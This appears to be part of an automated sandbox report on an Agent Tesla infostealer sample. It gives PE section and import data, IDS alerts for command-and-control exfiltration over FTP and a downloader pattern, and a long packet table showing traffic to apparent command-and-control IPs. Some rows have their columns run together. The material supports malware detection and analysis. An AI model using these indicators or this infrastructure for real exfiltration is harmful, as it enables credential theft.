.reloc | 0x1a000 | 0xc | 0x200 | 4d0a5ae683f3bb0722d485fd69908d52 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-08-02T15:02:16.556150+0200 | TCP | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 49709 | 47808 | 192.168.2.9 | 108.179.234.136
2024-08-02T15:02:12.198468+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49707 | 443 | 192.168.2.9 | 172.67.189.102
2024-08-02T15:02:10.477622+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49706 | 443 | 192.168.2.9 | 172.67.189.102
2024-08-02T15:02:16.550510+0200 | TCP | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 49709 | 47808 | 192.168.2.9 | 108.179.234.136
2024-08-02T15:02:16.074554+0200 | TCP | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 49708 | 21 | 192.168.2.9 | 108.179.234.136
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 2, 2024 15:02:00.345972061 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11
Aug 2, 2024 15:02:02.470907927 CEST | 49676 | 443 | 192.168.2.9 | 23.206.229.209
Aug 2, 2024 15:02:02.471060991 CEST | 49675 | 443 | 192.168.2.9 | 23.206.229.209
Aug 2, 2024 15:02:02.736515045 CEST | 49674 | 443 | 192.168.2.9 | 23.206.229.209
Aug 2, 2024 15:02:02.752197981 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11
Aug 2, 2024 15:02:07.564659119 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11
Aug 2, 2024 15:02:08.767766953 CEST | 49673 | 443 | 192.168.2.9 | 204.79.197.203
Aug 2, 2024 15:02:09.558975935 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:09.559056997 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:09.559289932 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:09.586723089 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:09.586757898 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.079090118 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.079324007 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.188405037 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.188424110 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.188828945 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.189019918 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.190865993 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.236501932 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.477637053 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.477684021 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.477711916 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.477720976 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.477762938 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.477762938 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.477941036 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.478022099 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.478023052 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.478033066 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.478090048 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.478123903 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.478157043 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.478159904 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.478159904 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.478159904 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.478159904 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.478168964 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.478195906 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.478210926 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.478379965 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.478379965 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.478387117 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.478477001 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.559781075 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.559916019 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:10.559963942 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.560025930 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.579720020 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:10.579756975 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:11.389694929 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:11.389740944 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:11.389837980 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:11.390117884 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:11.390134096 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:11.895293951 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:11.895359039 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:11.896071911 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:11.896085024 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:11.896284103 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102
Aug 2, 2024 15:02:11.896290064 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:12.080311060 CEST | 49676 | 443 | 192.168.2.9 | 23.206.229.209
Aug 2, 2024 15:02:12.080327034 CEST | 49675 | 443 | 192.168.2.9 | 23.206.229.209
Aug 2, 2024 15:02:12.198489904 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:12.198544025 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:12.198579073 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:12.198615074 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:12.198643923 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:12.198671103 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
Aug 2, 2024 15:02:12.198697090 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9
                                                        Aug 2, 2024 15:02:12.198736906 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.198736906 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.198738098 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.198738098 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.198765993 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.198781967 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.198812962 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.198929071 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.198967934 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.198972940 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.198986053 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.199018002 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.279582024 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.279694080 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.291107893 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.291155100 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.291184902 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.291193008 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.291208982 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.291220903 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.291266918 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.291271925 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.291311979 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.291508913 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.291558027 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.291563988 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.291575909 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.291601896 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.291630983 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.291651964 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.291697979 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.291697979 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.291707039 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.291728973 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.291763067 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.292315006 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.292361975 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.292368889 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.292407990 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.292495012 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.292546988 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.292552948 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.292589903 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.293252945 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.293308020 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.293323040 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.293366909 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.293373108 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.293382883 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.293418884 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.293425083 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.293469906 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.293977022 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.294030905 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.294039011 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.294187069 CEST49707443192.168.2.9172.67.189.102
Aug 2, 2024 15:02:12.345921993 CEST | 49674 | 443   | 192.168.2.9     | 23.206.229.209
Aug 2, 2024 15:02:12.363264084 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.363329887 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.363329887 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.363354921 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.363370895 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.363415956 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.384895086 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.384994984 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.385019064 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.385026932 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.385040045 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.385067940 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.385133982 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.385282993 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.385335922 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.385685921 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.385750055 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.385797024 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.385920048 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.386549950 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.386673927 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.386708021 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.386765957 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.387497902 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.387552023 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.387645960 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.387695074 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.387710094 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.387742043 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.388505936 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.388535976 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.388566971 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.388580084 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.388601065 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.388631105 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.389254093 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.389312029 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.389364004 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.389410019 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.390480042 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.390526056 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.457319975 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.457375050 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.457402945 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.457433939 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.457447052 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.457475901 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.478864908 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.478926897 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.478976011 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.479015112 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.479036093 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.479048014 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.479057074 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.479084969 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.479101896 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.479149103 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.479355097 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.479389906 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.479408979 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.479415894 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.479429960 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.479463100 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.479588985 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.479640007 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.480159998 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.480220079 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.480298996 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.480365038 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.481074095 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.481129885 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.481151104 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.481199980 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.481221914 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.481251001 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.481262922 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.481271982 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.481318951 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.481318951 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.481924057 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.481956005 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.481981993 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.481991053 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.482013941 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.482033014 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.482130051 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.482191086 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.482741117 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.482795954 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.482841015 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.482888937 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.483120918 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.483189106 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.483602047 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.483650923 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.483848095 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.483896971 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.483942032 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.484025955 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.551167011 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.551219940 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.551302910 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.551326990 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.551358938 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.551384926 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.551445007 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.573103905 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.573147058 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.573256016 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.573275089 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.573307037 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.573405981 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.573458910 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.573987007 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.574023008 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.574064016 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.574068069 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:12.574114084 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.574126959 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.574291945 CEST | 49707 | 443   | 192.168.2.9     | 172.67.189.102
Aug 2, 2024 15:02:12.574311018 CEST | 443   | 49707 | 172.67.189.102  | 192.168.2.9
Aug 2, 2024 15:02:14.004463911 CEST | 443   | 49704 | 23.206.229.209  | 192.168.2.9
Aug 2, 2024 15:02:14.004723072 CEST | 49704 | 443   | 192.168.2.9     | 23.206.229.209
Aug 2, 2024 15:02:14.727148056 CEST | 49708 | 21    | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:14.732115984 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:14.732507944 CEST | 49708 | 21    | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:15.256807089 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:15.257108927 CEST | 49708 | 21    | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:15.262059927 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:15.372625113 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:15.372781038 CEST | 49708 | 21    | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:15.377616882 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:15.577150106 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:15.579257965 CEST | 49708 | 21    | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:15.585046053 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:15.696149111 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:15.696368933 CEST | 49708 | 21    | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:15.701306105 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:15.813287020 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:15.813568115 CEST | 49708 | 21    | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:15.818932056 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:15.929900885 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:15.932024002 CEST | 49708 | 21    | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:15.937184095 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:16.068078041 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:16.069505930 CEST | 49709 | 47808 | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:16.074357986 CEST | 47808 | 49709 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:16.074471951 CEST | 49709 | 47808 | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:16.074553967 CEST | 49708 | 21    | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:16.079355001 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:16.545480013 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:16.550509930 CEST | 49709 | 47808 | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:16.550553083 CEST | 49709 | 47808 | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:16.555428982 CEST | 47808 | 49709 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:16.556070089 CEST | 47808 | 49709 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:16.556149960 CEST | 49709 | 47808 | 192.168.2.9     | 108.179.234.136
